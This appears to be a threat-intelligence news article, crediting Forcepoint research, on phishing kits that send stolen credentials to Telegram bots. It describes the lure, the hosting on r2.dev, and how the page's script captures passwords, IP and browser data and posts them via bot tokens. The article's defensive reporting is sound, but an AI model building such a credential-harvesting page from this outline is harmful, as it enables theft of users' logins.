Telegram, a popular messaging platform with open APIs, has become a vector for escalating phishing attacks. Threat actors are exploiting the platform’s accessibility to create malicious bots and applications designed to steal user credentials.
These attacks leverage Telegram’s features to distribute phishing links, impersonate legitimate entities, and deceive users into compromising sensitive information.
A phishing email lures victims with a button disguised as a document viewer. Clicking it leads to a malicious URL on Cloudflare’s r2.dev storage, which hosts a phishing landing page.
The page utilizes JavaScript with jQuery to handle form submissions. When the user enters credentials, a client-side script triggers a POST request, exfiltrating the stolen data (likely including email address and credentials) to a Telegram bot.
It implements a malicious function that exfiltrates sensitive visitor data by constructing a detailed message incorporating various information points, including potentially compromised credentials.
This crafted message is subsequently transmitted to a designated Telegram chat via an API request, facilitating data theft and potentially enabling further phishing attacks.
The script processes phishing landing pages by extracting a Base64-encoded hash from the URL, decoding it, and storing the result in the ‘ai’ variable. If ‘ai’ is populated, the script attempts to fetch and display logos associated with domains derived from an email address.
It also utilizes Telegram bot tokens and chat IDs for message sending (BOT_TOKEN, CHAT_ID) and potential logging (LOGGER_TOKEN, LOGGER_ID), along with a Base64-encoded URL stored in the ‘FILE’ variable.
The form submission handler intercepts the default form submission behavior triggered by clicking the ‘submit-btn’ button. By employing ‘event.preventDefault()’, it suppresses the browser’s automatic form data transmission and page reload.
It enables custom JavaScript logic to handle the form submission process, offering greater control over data handling and user experience compared to traditional form submission methods.
The code validates the email format using a regular expression and ensures the password length exceeds four characters. Upon successful validation, it asynchronously sends user data, including email, password, browser details, language, and MX record, to a Telegram bot via AJAX.
Based on the bot’s response, the code either displays an error message or simulates a successful login by redirecting to a specified PDF document, indicating a potential login authentication process.
According to ForcePoint, it utilizes various helper functions to gather and transmit visitor data. `handleBase64Data` decodes potentially sensitive information like URLs.
`GetBrowserandLanguage` retrieves user agent details. `logVisitorToTelegram` asynchronously logs visitor email (likely for marketing) to a Telegram channel via a logger bot.
Asynchronous functions `getMXRecord` and `getVisitorIP` fetch domain MX records and visitor IP details (potentially including city, country, and region) from external services, possibly for verification or targeting purposes.
The `FILE` variable, containing a decoded Base64 string resembling a URL, suggests visitor information might be sent to a specific destination (“hxxps[://]goldviseinvesmenu[.]com/levels/ll[.]php”).
